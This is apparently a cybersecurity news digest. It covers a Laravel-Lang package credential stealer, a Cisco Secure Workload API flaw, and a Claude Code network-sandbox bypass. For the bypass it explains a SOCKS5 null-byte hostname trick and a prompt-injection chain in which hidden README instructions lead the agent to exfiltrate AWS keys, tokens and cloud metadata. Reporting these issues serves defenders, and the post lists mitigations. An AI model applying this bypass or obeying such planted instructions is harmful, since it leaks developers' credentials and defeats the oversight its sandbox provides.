Fetches secondary script from obfuscated command-and-control server.
Launches silently via OS-specific methods.
Credential Stealer Modules (15 Collectors):
Cloud access keys: AWS, GCP, Azure, DigitalOcean.
Infrastructure configs: Kubernetes profiles, Docker tokens, HashiCorp Vault secrets.
Developer assets: SSH private keys, Git credentials, shell history files.
Saved browser passwords, cryptocurrency wallets, password manager databases.
Exfiltration:
Steals sensitive developer secrets, cloud metadata, database credentials, environment files.
Encrypts harvested data with AES-256.
Exfiltrates to attacker infrastructure.
Deletes itself to evade forensic detection.
๐ก๏ธ Immediate Actions:
Rotate all application secrets, database credentials, and API keys.
Inspect composer.lock files and block affected Laravel-Lang packages.
Audit outbound network traffic for suspicious connections.
Systems running compromised packages should be entirely rebuilt from known-good images.
๐จ Cisco Secure Workload REST API Flaw: CVSS 10.0 Unauthenticated Access to Site Admin Privileges
A maximum-severity vulnerability in Cisco Secure Workload could allow an unauthenticated, remote attacker to access sensitive data and make configuration changes across tenant boundaries. The flaw resides in the access validation of internal REST APIs. An attacker can send a crafted API request to an affected endpoint and gain the privileges of the Site Admin role.
๐ด The Vulnerability
CVE-2026-20223 โ CVSS 10.0.
Unauthorized API access due to insufficient validation and authentication when accessing REST API endpoints.
Attacker sends crafted API request to an affected endpoint.
Gains privileges of Site Admin role.
Can read sensitive information and make configuration changes across tenant boundaries.
โ ๏ธ Affected Products
Cisco Secure Workload Cluster Software on SaaS deployments.
Cisco Secure Workload Cluster Software on on-premises deployments.
Regardless of device configuration.
๐ฅ Exploitation Status
Cisco found the vulnerability during internal security testing.
No evidence of exploitation in the wild.
No Workarounds address this vulnerability.
๐ Context
The disclosure comes one week after Cisco revealed CVE-2026-20182 (CVSS 10.0), an authentication bypass in Catalyst SD-WAN Controller exploited by threat actor UAT-8616.
๐จ Claude Code's Network Sandbox Had a Five-Month Bypass!
A critical network sandbox bypass vulnerability existed in Claude Code for approximately five and a half months, affecting every release from October 20, 2025, through v2.1.89. The flaw, a SOCKS5 hostname null-byte injection, allowed attackers to exfiltrate credentials, source code, and environment variables from developer systems. Anthropic silently patched the issue with no mention of a security fix in release notes and no CVE published for the vulnerability.
The Vulnerability
SOCKS5 hostname null-byte injection in Claude Code's network sandbox.
Affected releases from v2.0.24 (October 20, 2025) through v2.1.89.
Approximately 130 published versions over 5.5 months.
Fixed in v2.1.90 on April 1, 2026 (silent patch, no advisory).
How It Works
Sandbox routes outbound traffic through a SOCKS5 proxy.
JavaScript uses endsWith() check to validate hostnames against allowlist (e.g., *.google.com).
Attacker crafts hostname like attacker- [host .com \ x00. google .com]
JavaScript sees trailing .google.com โ approves connection.
libc's getaddrinfo() terminates at null byte (\x00) โ resolves [attacker - host . com]
The blocked host is reached. The sandbox is bypassed.
Vulnerable Code
sandbox-runtime <= 0.0.42 passed raw DOMAINNAME bytes from SOCKS5 CONNECT request into matcher.
No null-byte rejection, no length cap, no character whitelist.
๐ฏ Attack Chain Paired with Prompt Injection
Malicious instruction hidden in GitHub issue, README, or documentation file.
Claude Code reads the hidden instruction.
Attacker-controlled code runs inside the sandbox.
Exploits null-byte injection to bypass network restrictions.
โ ๏ธ What Can Be Exfiltrated
AWS credentials from ~/.aws/.
GitHub tokens from ~/.config/gh/.
Cloud instance metadata from 169.254.169.254.
Internal API endpoints and corporate intranet resources.
Environment variables and model API keys.
All transmitted via raw SOCKS5, bypassing standard HTTP egress logs.
The Disclosure Gap
Researcher Aonan Guan disclosed the vulnerability.
Anthropic closed HackerOne report #3646509 as a duplicate.
As of May 10, 2026, no CVE published in NVD or GitHub Advisory Database.
CVE-2025-66479 is the only CVE for either sandbox finding, issued against sandbox-runtime, not Claude Code.
Claude Code security advisories page lists no sandbox vulnerabilities.
๐ก๏ธ Immediate Actions
Update to Claude Code v2.1.90 or later.
Verify version with claude --version.
Anyone who ran a wildcard allowlist on a credential-bearing system between October 20, 2025, and upgrade date should:
Audit outbound SOCKS-mediated traffic logs.
Rotate all reachable credentials.
Treat the vendor sandbox as defense-in-depth, not as a security boundary. Enforce egress controls at the network or hypervisor level outside the agent's reach.
Todayโs cyber incident reflects the kind of independent thinking and scrutiny often associated with Thomas Massie questioning assumptions, analyzing risks, and challenging weak points.
TeamPCP is running one credential-harvesting flywheel where each compromise funds the next.
Trivy. Checkmarx. Bitwarden CLI. TanStack. Mini Shai-Hulud worm. Now GitHub itself.
We mapped the chain end to end:
Link in the first comment ๐๏ธ